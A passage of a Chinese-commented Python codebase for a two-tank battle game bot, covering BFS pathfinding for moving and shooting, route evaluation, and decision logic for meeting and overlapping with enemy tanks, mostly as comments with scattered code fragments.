父节点 "step": int ( >= 0 ) 还差几步到达,为 0 表示到达,初始值为 weight - 1 "weight": const int ( >= 1 ) 权重,即搜索时需要在其上耗费的步数 "last_action": const int 通过什么操作到达这个节点,该情况为移动 ] # width, height 对应着转置前的 宽高 # debug_print("map:\n", matrixMap.T) # debug_print("weight:\n", matrixWeight.T) # debug_print("can move on:\n", matrixCanMoveTo.astype(np.int8).T) # 初始节点本来就已经到达了 # 初始节点不耗费步数 # queue( [Node] ) # init # 还剩 step 步 # 相当于下一个节点 # 到达终点 # not in map if DEBUG_MODE: debug_print("distance matrix:\n", matrixDistance.T) # 空节点 BFS 搜索从 start 开始到击中 end 的所有路径,由短到长依次返回 ---------------------------------------------------------------------------- 实现思路: 通过射击的方式能够比单纯通过移动的方式更快地接近目标,这是显而易见的,毕竟炮弹可以飞行。 于是,将地图划分为两个区域,一个是可以发动射击的区域,它们仅仅与目标处在同一行或同一列的位置上 另一个就是常规的移动可达的区域。搜索过程中对着两种情况下相应的节点权重做区分对待即可。 
--------------------------------------------------------------------------- Input: - start (int, int) 起始坐标 (x1, y2) - end (int, int) 终点坐标 (x2, y2) ,其对应的 field 类型必须不在 destroyable_types 的定义里,否则查找到的路径为空 - map_matrix_T np.array( [[int]] ) field 类型值的矩阵的转置,坐标形式 (x, y) - move_weight_matrix_T np.array( [[int]] ) 移动到这个格子所需的步数 - shoot_weight_matrix_T np.array( [[int]] ) 炮弹到达这个格子所需的步数 - block_types [int] 不能够移动到的 field 类型 WARNING: 需要自行指定不能被攻击的基地、坦克的类型 - destroyable_types [int] 能够通过射击行为摧毁的 field 类型,未指定在这个变量里的 所有其他 field 类型均默认视为不可摧毁,在以射击的方式进行 搜索时,遇到这样的 field 会跳过 WARNING: 需要自行制定可以被摧毁的基地、坦克的类型 - x_axis_first bool 是否优先搜索 x 轴方向 - middle_first bool 是否采用中路优先的搜索 Yield From: - routes [Route] 所有可以到达的路径。如果没有搜索到可以到达的路径,则返回空路径 -------------------------------------------------------------------------- def struct Node: // 定义节点模型 [ "xy": (int, int) 目标节点 "parent": Node/None 父节点 "step": int ( >= 0 ) 还差几步到达,为 0 表示到达,初始值为 weight - 1 "weight": const int ( >= 1 ) 权重,即搜索时需要在其上耗费的步数 "last_action": const int 通过什么操作到达这个节点,射击或移动 ] # 哪些位置可以移动到 # 那些位置上的 field 可以被摧毁 # 哪些位置可以对目标发动射击,即 end 向四个方向伸展开的区域 # 空对象 # 水路不可以发动射击,但是可以射过去 # 打一个补丁,不管怎么样,攻击者原地是可以发动射击的 ... # 已经找到了 start 没有必要再继续找下去了 # debug_print("map:\n", matrixMap.T) # debug_print("weight of move:\n", matrixMoveWeight.T) # debug_print("weight of shoot:\n", matrixShootWeight.T) # debug_print("can move to:\n", matrixCanMoveTo.astype(np.int8).T) # debug_print("can shoot:\n", matrixCanShoot.astype(np.int8).T) # debug_print("can be destroyed:\n", matrixCanBeDestroyed.astype(np.int8).T) # 初始节点本来就已经到达了 # 初始节点不耗费步数 # 对于 start == end 的情况,将返回 startNode,相当于原地等待 # queue( [Node] ) # 标记移动到的位置 # init # if start == (8, 1): # debug_print(start) # debug_print([n[0] for n in queue]) # 还剩 step 步 # 相当于下一个节点 # 1. 如果当前处在射击区域 # 2. 
或者上回合射击(事实上射击行为必定是可延续的,也就是上回合 canShoot 这回合 # 必定应该继续 canShoot ,但是对于 WaterField 来说,不属于可以发动射击的区域 # 因此,如果上回合射进 WaterField 那么上一个判定条件就会失效。但在这种情况下 # 应该视为射击行为延续,因此需要第二个判定条件) # # 因为在射击区域中,行为的方向都是单向的,不会出现从射击区域进入移动区域, # 或者从射击的下一步移动回到上一步的情况, # 因此没有必要对射击行为已到达过的节点位置进行检查和标记 # 确定射击方向 # 必定可以保证下一个节点仍然处在射击区域,不会到达地图外, # 并且下次还会继续进入这个分支,除非已经到达基地 # 补偿 # 标志着上一步处在射击区域内 # 射击的过渡动作,下一个动作和当前动作同时发生 # 添加到开头,下回合马上继续 # 否则为非射击区域,属于常规移动区域 # 只对移动区域进行标记 # not in map # 标志着上一步处在非射击区域内 # 空节点 搜索移动到目标的所有路径 Input: - matrix_T np.array( [[int]] ) 游戏地图的类型矩阵的转置 Yield From: - route Route # 射击一回合,移动一回合 搜索移动并射击掉目标的所有路径 输入输出同上 # weight 默认为 1,即移动一回合 # 射击一回合,移动一回合 # weight 默认为 0 ,即炮弹可以飞过 # 射击一回合,冷却一回合 # 射击一回合,之后就赢了 # 射击一回合,冷却一回合 # WARNING: # 这里只是从理论上分析 TANK, BASE 被打掉对应的权重,实际上我们不希望基地和队友 # 被打掉,因此在实际使用时,仅仅在 destroyable_types 中添加敌方的坦克即可 搜索移动到目标的最短路径 # 直接返回第一个 route 搜索移动并射击掉目标的最短路径 # 直接返回第一个 route [DEBUG] 传入 node chain head ,计算其所代表的节点链对应的距离 Return: - length int 路线长度,如果是空路线,返回 无穷大长度 #{ END 'strategy/search.py' }# #{ BEGIN 'strategy/evaluate.py' }# 根据敌我两架坦克的攻击线路长短,衡量当前侵略性 Input: - battler BattleTank - oppBattler BattleTank - strict bool 是否严格依据路线长度和两方基地位置进行评估 如果为 False ,则还会考虑其他的因素 - allow_withdraw bool 是否允许撤退 Return: [status] - Status.AGGRESSIVE 我方处于攻击状态 - Status.DEFENSIVE 我方处于防御状态 - Status.STALEMENT 双方处于僵持状态 - Status.WITHDRAW 我方处于撤退状态 # 可能会遇到这种糟糕的情况,队友挡住了去路 5cdde41fd2337e01c79f1284 #-------------------------- # 应该可以认为是侵略吧 # assert not myRoute.is_not_found() and not oppRoute.is_not_found(), "route not found" #debug_print(battler, oppBattler, "leading:", leadingLength) # 在敌方半边地图,更倾向于不防御 # # 在我方半边地盘,会增加防御的可能性 # 差一步都要算作防御! # # [1, +) # (-1, 1) -> 0 # [-2, -1] # 包含中线,放松一点条件 # (-, -2) # 否则不要撤退? # 严格模式直接返回评估状态 # # 撤退性状态直接返回 # # # 尽可能用攻击性策略! 
# # 还要判断对方的攻击路线是否可能会被我方队员阻拦 # 否则就过度防御了 5ce69a15d2337e01c7a90646 # # 此时视为侵略模式 评估两条路线的相似度 一般用于判断选择某条路线是否可以和敌人相遇 实现思路: -------------- 首先找出两者中最短的一条路径,对于其上每一个点,在另一条路上寻找与之距离最短(曼哈顿距离即可) 的点,并将这两个点之间的距离作为总距离的一个部分,每个分距离和相应点的权重的加权平均值即为总距离 最后的估值为 总距离除以最短路线的坐标点数的均值 的倒数 值越接近 1 表示越相近,值越接近 0 表示越不相近 根据实际情景的需要,我们将较长路劲多出来的那些点忽略 ... TODO: ------------- 1. 如何考虑坐标权重 2. 如何考虑长路径中多出来的那些点 # 确保 route1 坐标数不超过 route2 衡量敌人对我方所选的进攻路线的影响程度 ---------------------------------------- 敌人在进攻路线两侧,可能会阻碍进攻,也就是增加了相应路线进攻的回合数, 因此敌人的影响可以量化为相应路线长度的增加量。 将理论路线长度与敌人的影响所导致的长度增加量相加,所得的估值可以认为是 考虑了敌人影响后的真实路线长度,可以将这个真实路线长度对所选路线进行重新 排序,从而选出距离短,且受敌人影响最小的攻击路线 如何估计敌人影响? ------------------ 收集敌人当前所在位置所能影响到(近乎可认为是能射击到)的坐标。为了确保更加接近真实的情况, 再假设敌人当前回合能射击,模拟敌人所有可以执行的动作(包括移动和射击,考虑射击是因为有可能可以 摧毁一些土墙),之后同法收集敌人所能影响到的坐标。将这一坐标集所对应的区域视为受到敌人影响的区域。 随后统计当前路径与该坐标集的重叠程度(路径上的坐标出现在该坐标集内的,可视为重叠。这种路径节点的 数量越多,重叠程度越大),并认为这一重叠程度与敌人的影响程度正相关,也就是重叠的坐标点数与 路径长度的增长量正相关,从而实现量化估计。 特别的,如果敌人出现在攻击路线上,会造成较大的路线长度增加,有时甚至可以视为此路不通。 TODO: --------- 这种简单的静态分析策略可能存在对某些具体情况估计不到位的问题。当我方坦克沿着这条路线走到需要和 敌人正面交锋的位置时,有的时候可以通过闪避直接躲开,这种情况的影响可能比较小。而有的情况下是无法躲开的, 我方坦克只能选择往回闪避,这就相当于判定了这条路为死路 5cd24632a51e681f0e912613 (然而事实上情况还可以更加复杂,因为实际进攻的时候,有可能会采用一些特殊的策略,让这条路转化为活路, 例如预先打掉与我距离为 2 的墙)。 而在静态分析中,这些具体的差别可能无法区分,因此和更加真实合理的估计间可能存在着一定的差距。 但是采用动态分析可能不是一件很现实的事情,因为需要不断地模拟移动和模拟决策,一方面会造成算法过于 耗时,一方面也有可能会引入各种混乱(实现无差异地在多回合模拟移动和模拟决策间回滚,并且确保面向真实情况 决策的代码也能适用于模拟决策的情况,这将会是一个浩大的工程)。 Input: - route Route 待评估的路线 - player Tank2Player 将会采用这条路线的玩家对象 # 通过玩家对象引入 map 全局对象 # 受到敌人射击影响所导致的路线长度增量 # 敌人位于路线上所导致的路线长度增量 # 受敌人影响的坐标集 # 敌人阻塞的坐标集 # 刷新射击回合 # 包含了原地停止 # 同理刷新冷却 # blocking # 先加入敌人当前坐标 # 两个以上敌人,不划入影响范围,并直接结束 # 水路可以认为不影响 #elif isinstance(field, (BaseField, BrickField, SteelField, TankField) ): # block 类型,不划入影响范围,并直接结束 # 以 pass 结尾的分支最后到达这里 # 初始为路线长度 # 射击的过渡点 weight == 0 它,它实际上不受敌人射击的影响 # 敌人阻塞,可以影响射击点,因此同等对待 评估路线上 block 类型块的数量 ---------------------------- 被用于撤退路线的评估 撤退行为发生在己方基地,不宜过度攻击墙,否则可能会削弱基地的防御性 实现方法 ------------- 让 block 类型的块的权重增加,这样就可以让 block 更多的路线的长度增加 TODO: 是否对含有相同 block 的路线上的 block 进行进一步的评估?也就是认为基地外围的 block 
的权重更高? # 遇到墙,权重加 1 # 遇到最内层的墙,权重加 2 # 权重为 2 的块一定是 block 类型 # 位于 end 的外围 #{ END 'strategy/evaluate.py' }# #{ BEGIN 'decision/abstract.py' }# 决策者的抽象基类 ---------------- 泛指一切具有决策能力的对象,可以是具象的,例如 Team, Player 也可以是抽象的,例如决策类 该类的派生类对特定的决策代码段进行封装 如果派生类是决策类,那么将实现对决策逻辑的拆分,以此来提高决策树的清晰度,提高决策逻辑的复用性 用于判断决策对象返回的结果是否标志着该决策适用于当前情况,用于被外部判断 规定当该决策对象不能 handle 时,返回 __class__.UNHANDLED_RESULT 那么只需要判断实际返回值是否与之相等,即可判断该情况是否被 handle 真正用于被派生类重载的抽象决策接口 如果该情况不适用,那么不需要写任何返回值,函数默认返回 None make_decision 函数将以此来判断该情况是否被 handle 外部可调用的决策接口 ---------------------- 会对 _make_decision 的结果进行一些统一的处理,也可以用于在决策前后进行一些预处理和后处理操作 此处提供一个默认的情况的处理方法: ---------------------------------- - 如果真正的决策函数返回了一个 action ,则将其作为最终结果直接返回 - 如果当前情况不适用,真正的决策函数返回了 None ,则返回 UNHANDLED_RESULT 单人决策者的抽象基类,用于 Tank2Player 的个人决策 重写的构造函数,确保与 Tank2Player._make_decision 接口的参数列表一致 Input: - player Tank2Player 单人玩家实例 - signal int 团队信号 用于处理团队信号的决策模型 注意: ------------ # 将会处理到的团队信号 通常来说,如果团队发送了一个信号,必须及时返回一个结果 只有在 signal is None 的情况下,才返回 UNHANDLED_RESULT # 团队信号必须得到响应 团队决策的抽象基类,用于 Tank2Team 的双人决策 TeamDecision 与 SingleDecision 不一样,它不存在最优的决策者, 而是所有决策者都会尝试进行一次决策。决策存在高低优先级,高优先级的决策者 如果对某个 player 的行为进行了协调,那么低优先级的决策者不应该覆盖高优先级 决策者的现有决策结果(当然极其特殊的决策者例外)。 如果使用 DecisionChain 进行多个团队决策者的连续决策, 那么整个决策链上的所有决策者必定都会进行一次决策。 # Tank2Team 为了适应 DecisionChain 的决策,这里重写 is_handled 函数 使得无论如何都可以让 DecisionChain 继续 派生类重写的 _make_decision 要求返回值必须是 [int, int] 重写 makd_decision 接口 确保在决策完成后 player1, player2 的决策结果与返回结果同步 这主要考虑到在决策的时候可能会忘记 create_snapshot ... #{ END 'decision/abstract.py' }# #{ BEGIN 'decision/chain.py' }# 决策链 ------------- 效仿责任链模式,对多个决策实例进行组合,按优先级顺序依次进行决策 如果遇到一个符合条件的决策,则将其决策结果返回,否则继续尝试低优先级的决策 # 确保所有的 decision 实例均为 DecisionMaker 的派生 #{ END 'decision/chain.py' }# #{ BEGIN 'decision/single/leave_teammate.py' }# 处理两人重叠的情况 -------------------- 1. 尝试采用安全的移动行为离开队友 2. 避免和队友采用相同的移动方向 3. 尽量往不导致进攻路线增加的方向移动 # 存在风险 # 不能与队友的移动方向相同! # 没有合理的离开行为 ... # action -> deltaLength # 必定有路? 
# 移动后进攻路线短变短者值小 #{ END 'decision/single/leave_teammate.py' }# #{ BEGIN 'decision/single/attack_base.py' }# 特殊情况决策,当下一步就要拆掉敌方基地时 # TODO: # 可能需要考虑一种特殊情况: 队友被杀,自己下一步打掉对方基地,但是对方下一步把我干掉 # 这种情况下,即使我方拆掉对方基地也算平局。也许可以考虑先闪避一回合,然后再继续拆家。 # # 特殊状态 # 必定是射击 ... #{ END 'decision/single/attack_base.py' }# #{ BEGIN 'decision/single/encount_enemy.py' }# 遭遇敌人时的决策 # 两个敌人,尝试逃跑 # 可能会遇到极其罕见的三人重叠 # 首先判断是否为真正的双人夹击 # 先判断敌人是否重叠,如果是,那么很有可能直接击杀! # 队友还没有死,自己可以考虑牺牲 # 实际可视为一个人 # 真正的被夹击 # 如果两者都有弹药,可能要凉了 ... # TODO: 这种情况下有选择吗? # 随便打一个? # 均不能进攻的话,优先闪避到下回合没有敌人的位置(优先考虑拆家方向) # 如果是移动行为 # 一个可行的闪避方向 # 均不能闪避,应该是处在狭道内,则尝试任意攻击一个 # TODO: 是否有选择? # 随便打一个 # 有一个能射击,则反击他 # 找到能射击的敌人 # 不能闪避 # 要凉了 ... # 统一判断 # 没有办法?尝试反击 # 要凉了 # 没有办法对付 .. # 无所谓的办法了... # TODO: # 虽然说遇到了两个一条线上的敌人,但是这不意味着后一个敌人就没有威胁 5ccee460a51e681f0e8e5b17 # 当前情况: # --------- # 1. 敌人数量为 2 但是一个处在另一个身后,或者重叠,可视为一架 # 2. 敌人数量为 1 # # len(aroundEnemies) == 2: # # (inserted) 判断上回合敌人是否和我重叠,用于标记敌人 5ce52a48d2337e01c7a714c7 # # 且不是因为我方主动打破重叠导致 # 上回合刚刚进入重叠,这回合就被打破 # # 在非 WITHDRAW 的情况下,评估当前侵略性 # # 侵略模式/僵持模式 #---------- # 1. 优先拆家 # 2. 只在必要的时刻还击 # 3. 闪避距离不宜远离拆家路线 # # 如果能直接打死,那当然是不能放弃的!! # 必死 # 其他情况,优先进攻,不与其纠缠 # 默认的进攻路线 # 存在风险 # # 原本移动或射击,因为安全风险而变成停留,这种情况可以尝试射击,充分利用回合数 # # TODO: # 实际上,很多时候最佳路线选择从中线进攻,但从两侧进攻也是等距离的, # 在这种情况下,由于采用从中线的进攻路线,基地两侧的块并不落在线路上,因此会被 # 忽略,本回合会被浪费。但是进攻基地两侧的块往往可以减短路线。因此此处值得进行 # 特殊判断 # # 为 block 对象,该回合可以射击 # TODO: 此时开始判断是否为基地外墙,如果是,则射击 # 刚刚对射为两回合,该回合双方都没有炮弹,尝试打破僵局 #--------------------------------------------------- # 当前为侵略性的,并且在对方地盘,尝试回退一步,与对方重叠。 # 后退操作必须要有限制 5cd10315a51e681f0e900fa8 # # 如果一直回头,尝试在这一步选择非回头的其他行为 5ced8eee641dd10fdcc7907f # # 还需要检查两者上上回合是否为等待 # 避免将边移动边对射的情况考虑进来 # 添加必须在对方地盘的限制,避免在我方地盘放人 # 只有侵略性的状态可以打破僵局 # 判断是否为反复回头 # 最近几回合内是否曾经回头过 # 严格不在我方基地 # 考虑用闪避的方式代替后退 # 删掉这个状态 # 否则继续回头 # 上回合正在和对方对射 # 但是我方本回合不能射击 # 并且对方本回合不能射击 # 保持对射状态,用于后方打破僵持 # 其余情况照常 # 否则不予理会,直接移动或者反击 # 补丁 #---------------------------- # 针对两者距离为 2 的情况,不能一概而论! # # 僵持模式考虑堵路 # 必定能找到路! 
# 更适合堵路 # 其他情况均可以正常移动 #player.set_status(Status.KEEP_ON_MARCHING) #return action # 直接抛出让后面的 decision 处理,当做没有这个敌人 # 不能移动,只好反击 # 对方有炮弹,需要分情况 5ccb3ce1a51e681f0e8b4de1 #----------------------------- # 1. 如果是侵略性的,则优先闪避,并且要尽量往和进攻路线方向一致的方向闪避,否则反击 # 2. 如果是僵持的,那么优先堵路,类似于 Defensive # # TODO: # 可能需要团队信号协调 5ccc30f7a51e681f0e8c1668 # # # 首先把堵路的思路先做了,如果不能射击,那么同 aggressive # # TODO: # 有的时候这并不是堵路,而是在拖时间! 5ccf84eca51e681f0e8ede59 # 上一回合保持重叠,但是却被敌人先过了,这种时候不宜僵持,应该直接走人 # 这种情况下直接转为侵略模式! # # 直接过到侵略模式 # 否则算作正常的防守 # # TODO: # 射击不一定正确,因为敌人可能上回合刚把我过掉,此时应该考虑主动闪走! # 5ce4e66cd2337e01c7a6abd7 # # # (inserted) 先看上回合是不是刚被对方过掉 # # 刚刚被对手打破重叠 # 刚刚被对手主动打破重叠 # 对方现在位于我的攻击路线上,说明对方上回合是 # 回头堵路,那么继续保持射击 # 正常防御 # 保持对射 # 否则视为进攻逻辑 # 闪避,尝试找最佳方案 #------------------------- # 限制条件,只有在对方基地才开始闪现! # # 最佳方向是闪避向着进攻方向移动 # # 与进攻方向相同的方向是最好的 # 风险评估 # 闪避加行军 # 没有最佳的闪避方案,仍然尝试闪避 #----------------------------- # 但是不能向着增加攻击线路长短的方向闪避! # # 不能超过当前路线长度,否则就是浪费一回合 # # 此时还可以考虑借力 # 假设下回合两方对射,如果我方尝试闪避,对方会恰好打掉我方进攻路线上的块,那么就闪避 # # 存在可用的闪避行为 # 限制为只有在对方基地才适用这个逻辑 # 假设闪走 # 对手会打掉墙 # 这个块在某一个最短的攻击路线上 # # 没有不能不导致路线变长的办法,如果有炮弹,那么优先射击! # 5ccef443a51e681f0e8e64d8 #----------------------------------- # (inserted) 刚刚对射为两回合,该回合尝试闪避敌人,打破僵局 #-------------------------------------------- # 尝试往远处闪避,创造机会 # # 此外,由于敌人这回合必定射击,那么他的炮弹可能会打掉我身后的墙 # 这样的可能会创造一些新的机会。有的时候导致该回合必须要与敌人对射的原因,可能是因为 # 没有办法开辟攻击路线,而不是敌人堵路。由于闪避的方向是不允许的,也就是另一个更近的 # 闪避反向上必定是一个无法摧毁也不能移动到的块,否则会被与先摧毁。 # 此时如果可以往背离敌人的方向移动,那么应该不会陷入对射僵局。但事实上是进入了 # 这就说明别离敌人的方向是无法移动到的。如果它恰好是一块土墙,那么就可以靠这回合和敌人接力 # 来摧毁掉,也许还有往下移动的可能。 5ce429fad2337e01c7a5cd61 # # 检查对应的两个冷却回合是停止 # 避免将移动对射的情况被考虑进来 # 添加必须在对方地盘的限制,避免在我方地盘放人 # 只有侵略性的状态可以打破僵局 # 这里还是再判断一下距离 # 默认是优先射击 # 如果不能射击,那么终究还是要闪避的 # 或者是无法后方移动,为了打破僵局,尝试闪避 #---------------------------------- # # 因为这种情况很有可能会出现死循环 5cd009e0a51e681f0e8f3ffb # 为了后续能够打破这种情况,这里额外添加一个状态进行标记 # # # 其实还有一种情况,那就是危险的敌人在自己身上! 5ceaaacdd2337e01c7adf6a4 # # 这种情况下实际是没有威胁的 ... # TODO: # 还需要判断是否向远路闪避 ... # 这里的细节还需要优化,或者这个和自己重叠的条件在前面就要穿插进去 # 否则就凉了 ... # 防御模式 #---------- # 1. 如果对方下回合必死,那么射击 # 2. 优先堵路,距离远则尝试逼近 # 3. 
必要的时候对抗 # 4. 距离远仍然优先 # # elif status == DEFENSIVE_STATUS: # attackAction = self.try_make_decision(battler.get_next_attacking_action()) # 默认的侵略行为 # 必死情况 # # 不能马上打死,敌人又无法攻击 #------------------------------- # 优先堵路,根据双方距离判断 # # 必定能找到路! # 双方相邻,选择等待 # 此处首先延续一下对射状态 # 上回合正在和对方对射 # 但是我方本回合不能射击 # 并且对方本回合不能射击 # 保持对射状态,用于后方打破僵持 # 和对方相隔两个格子以上 # 可以安全逼近 # 可以认为在堵路 ... # 否则只好等额爱 # _route.length == 2: # 相距一个格子,可以前进也可以等待,均有风险 #---------------------------------------- # 1. 如果对方当前回合无法闪避,下一回合最多只能接近我 # - 如果对方下回合可以闪避,那么我现在等待是意义不大的,不如直接冲上去和他重叠 # - 如果对方下回合仍然不可以闪避,那么我就选择等待,反正它也走不了 # 2. 如果对方当前回合可以闪避,那么默认冲上去和他重叠 # - 如果我方可以射击,那么对方应该会判定为闪避,向两旁走,那么我方就是在和他逼近 # - 如果我方不能射击,对方可能会选择继续进攻,如果对方上前和我重叠,就可以拖延时间 # # TODO: # 好吧,这里的想法似乎都不是很好 ... # 能不防御就不防御,真理 ... # if len( oppBattler.try_dodge(battler) ) == 0: # 对手当前回合不可闪避,当然我方现在也不能射击。现在假设他下一步移向我 action = oppBattler.move_to(battler) # 对方移向我 if map_.is_valid_move_action(oppBattler, action): map_.simulate_one_action(oppBattler, action) # 提交模拟 if len( oppBattler.try_dodge(battler) ) == 0: # 下回合仍然不可以闪避,说明可以堵路 map_.revert() player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY map_.revert() # 否则直接冲上去 if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全移动 moveAction = battler.move_to(oppBattler) player.set_status(Status.READY_TO_BLOCK_ROAD) # 可以认为在堵路 return moveAction else: # 冲上去不安全,那就只能等到了 player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY else: # 对手当前回合可以闪避,那么尝试冲上去和他重叠 # TODO: # 可能弄巧成拙 5cca97a4a51e681f0e8ad227 # # 这个问题需要再根据情况具体判断! # ''' if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全重叠 moveAction = battler.move_to(oppBattler) player.set_status(Status.READY_TO_BLOCK_ROAD) return moveAction else: # 有风险,考虑等待 player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY ''' # # TODO: # 是否应该根据战场情况进行判断,比如停下来堵路对方一定无法走通? # # 假设自己为钢墙然后搜索对方路径? # player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # 似乎没有比这个这个更好的策略 ... # 对方可以射击 # 优先反击 # 触发对射状态 # 不能反击,只好闪避 # 凉了 ... # len(actions) == 2: # 统一判断 # 否则就凉了 ... 
# # 回撤模式 #------------ # 1. 优先回撤 # 2. 如果处在守卫状况,根据所处位置,选择反击或堵路 # # 安全行为 # 留给 withdraw 处理 # 现在我方坦克已经处在基地附近 # 符合 base defense 的条件 # 安全行为 # 留给 base defense # # 否则就是不安全行为,应该予以反击 # # 否则应该闪避 # 不然就凉了 ... # 最后就等待 #{ END 'decision/single/encount_enemy.py' }# #{ BEGIN 'decision/single/overlapping.py' }# 与敌人重合时的决策 ------------------------ 侵略模式 -------- 1. 直奔对方基地,有机会就甩掉敌人 防御模式 -------- 1. 尝试回退堵路 2. 对于有标记的敌人,考虑采用其他的策略,例如尝试击杀敌军 多回合僵持后,会有主动打破重叠的决策 # 看作是防御 # # 先检查对方上回合是否在跟随我移动,以及时切换决策模式 ... # 5cd3f56d86d50d05a0083621 / 5ccec5a6a51e681f0e8e46c2 / 5ce26520d2337e01c7a3ca2b #------------------------------- # 如果和一个带有跟随重叠标记的敌人僵持超过 3 回合,就把这个标记移除,因为它此时已经不是一个会和我马上打破重叠的敌人了 # 5ce3c990d2337e01c7a54b4c # TODO: 是否有必要判断射击方向相同? # 如果和一个带有跟随重叠标记的敌人在同一回合采用射击的方式打破重叠,则对这个行为进一步标记 # # (inserted) 如果敌人带有立即打破重叠的标记,那么如果还能执行到这个地方,就意味着敌人 # 上次打破重叠的方向是回防(如果是进攻,那么应该不会再有机会遭遇) # # 那么在此处重新进入重叠的时候,尝试将对手击杀 # # 防御模式不触发? # 上回合不重叠 # # (inserted) 观察到大多数人在遇到重叠时会选择直接无视对手,我们也可以学习一下这种决策 # 但是目前不想让这个决策成为必须,希望它只在特定的状况下被触发。 # # 对于非防御模式下,考虑这样三种情况: # ------------------------------------- # 1. 假设我方当前进攻路线距离领先一步 ,如果对方主动打破重叠,这时,如果对方下一步可以闪避, # 而我方当前回合不饿能闪避,必须要还击(之所以必须要射击是因为我们考虑最坏的情况,假设 # 对方这回合会还击,如果我方这时候不还击就会被打掉),假如对方这回合闪避了,并且恰好沿着进攻 # 方向闪避,那么结束后对方将比我方领先一步,这时候即使再继续攻击,结局也很可能是输, # 因此这步可以考虑主动打破重叠 # # 2. 假设我方当前进攻路线长度与敌方相同,假设对方主动打破重叠,假设对方可以闪避并且可以向着 # 进攻方向闪避,那么对方很有可能比我方快一步,此时应该主动打破重叠。假如对方不能向着进攻方向 # 闪避,那么认为敌人一定会还击,此时考虑我方下回合是否可以向着进攻方向闪避,如果不可以的话, # 我方就和对方差一步,处于劣势,那么就主动打破重叠。 # # 3. 假设对方比我方领先一步,这种情况下多属于对方处在我方阵营,我方很可能会触发防御模式 # 这种情况下就直接忽略掉吧 # # 虽然应该不可能,但是还是判断一下 # 我方领先步数 # TODO: # 是否有必要考虑射击行为? # 情况一 # # 由于不同的路线下一步可能会走到相同的地方,而造成的结果相同 # 因此此处将相同的行为进行缓存,为了减少判断次数 # 只考虑移动行为,因为,假如对方当前回合射击,那么我方下回合可以移动 # 这时双方距离可以认为相等,很有可能平局 # 提交地图模拟这步行为,这个时候双方应该均为僵持 # 考虑下回合我方是否可以闪避 # 确保这种情况下决策不会再运行到这里,因为此时将不再和敌人重叠,于是不会遇到递归无终点 # 说明下回合我方可以闪避,那么就可以不管了 # 我方下回合不可以闪避,考虑敌人下回合是否可以闪避 # 说明下回合敌人可以闪避 # 情况二 # TODO: # 仍然不考虑射击?为了防止无迭代终点? 
# 提交一步模拟,敌方应该比我方领先一步 # 考虑下回合敌方是否可以闪避 # 敌方可以闪避 # 对方下回合不可以闪避,那么考虑我方是否可以闪避 # TODO: # 我方下回合可能是防御状态,这种情况下必定反击,判断不准确 # # 不过问题其实不大,因为这样就会触发主动打破重叠 # # 我方不能闪避 # 其他情况,留作下一回合打破重叠 # # 假设下一步射击,考虑最糟糕的一种情况,那就是敌人同一回合主动打破重叠,移动到我方身后 # 而我方无法闪避,那么就有被敌人击杀的风险 # # 无法闪避! # 在没有被击杀风险的情况下可以采用射击 # 是否已经有多回合僵持,应该主动打破重叠 # 可以射击 # 上回合重叠这回合还重叠,就视为僵持,趁早打破重叠 # 对方不能射击,对自己没有风险,或者是符合了主动打破重叠的条件 # 尝试继续行军 # # 首先先处理主动打破重叠的情况的情况 # 该情况下会改用定制的安全性测试函数判断情况 # # TODO: # 优先尝试不往上回合已经移动过的方向移动 5ce26520d2337e01c7a3ca2b # # # 如果遇到和我打破重叠时机一致的对手 #------------------- # 1. 尝试换一个方向移动 # 2. 如果不能换方向,那么可能在狭道内,那么退回原来的位置, # 这意味着如果敌人下回合开炮,那么他必死 5ce264c2d2337e01c7a3c9f6 # # # 禁止的行为不一定是反向!因为可能恰好遇到拐弯 ... # 5ce48707d2337e01c7a641b7 / 5ce487a6d2337e01c7a64205 # # 有可能上回合是等待,也就是 # 上回合又下方决策得到,因此需要一直回查到移动行为 # 反向移动的行为 # # 尝试移向其他的方向 # # TODO: # 太难判断了,还是暂时先禁止把 ... 鬼知道对面怎么算的距离 # if realAction == forbiddenAction: route1 = battler.get_shortest_attacking_route() for optionalAction in battler.get_all_valid_move_actions(): if (optionalAction == forbiddenAction or optionalAction == revertMoveAction # 不要回头 ): continue with map_.simulate_one_action(battler, optionalAction): route2 = battler.get_shortest_attacking_route() if route2.length <= route1.length: # 移动后不增加攻击距离s realAction = optionalAction break # # 尝试反向移动 # # TODO: # 事实上反向移动也不一定是正确的,因为每一个人对于这种情况的判断是不一样的 # 5ce4943ed2337e01c7a64cdd # if realAction == forbiddenAction: with map_.simulate_one_action(battler, revertMoveAction): if len(oppBattler.try_dodge(battler)) == 0: # 如果这回合他反向射击,那么必死 realAction = revertMoveAction # # 否则等待,让敌人开一炮,这样下回合还会继续触发移动 # 有可能换一个敌方就可以有别的决策方法 # 也有可能直接带到基地 5ce48b77d2337e01c7a644e5 # # 保持等待状况 # 无法安全移动,但是又需要打破重叠,那么就视为防御 # 让后续的代码进行处理 # 这里会漏到 DEFENSIVE # 开始处理常规情况 # 继续起那就 # 否则就是等待了,打得更有侵略性一点,可以尝试向同方向开炮! # 下一步预计射击 # 否则停留 # 原地等待 # 对方不能射击,对自己没有风险,或者是符合了主动打破重叠的条件 # # 这里不只思考默认的最优路径,而是将所有可能的最优路径都列举出来 # 因为默认的最优路径有可能是破墙,在这种情况下我方坦克就不会打破重叠 # 这就有可能错失防御机会 # # 模拟对方的侵略性算法 # 大概率是移动 # 主要是为了确定方向 # 首先先检查对方是否会跟随我 #-------------------------- # 1. 
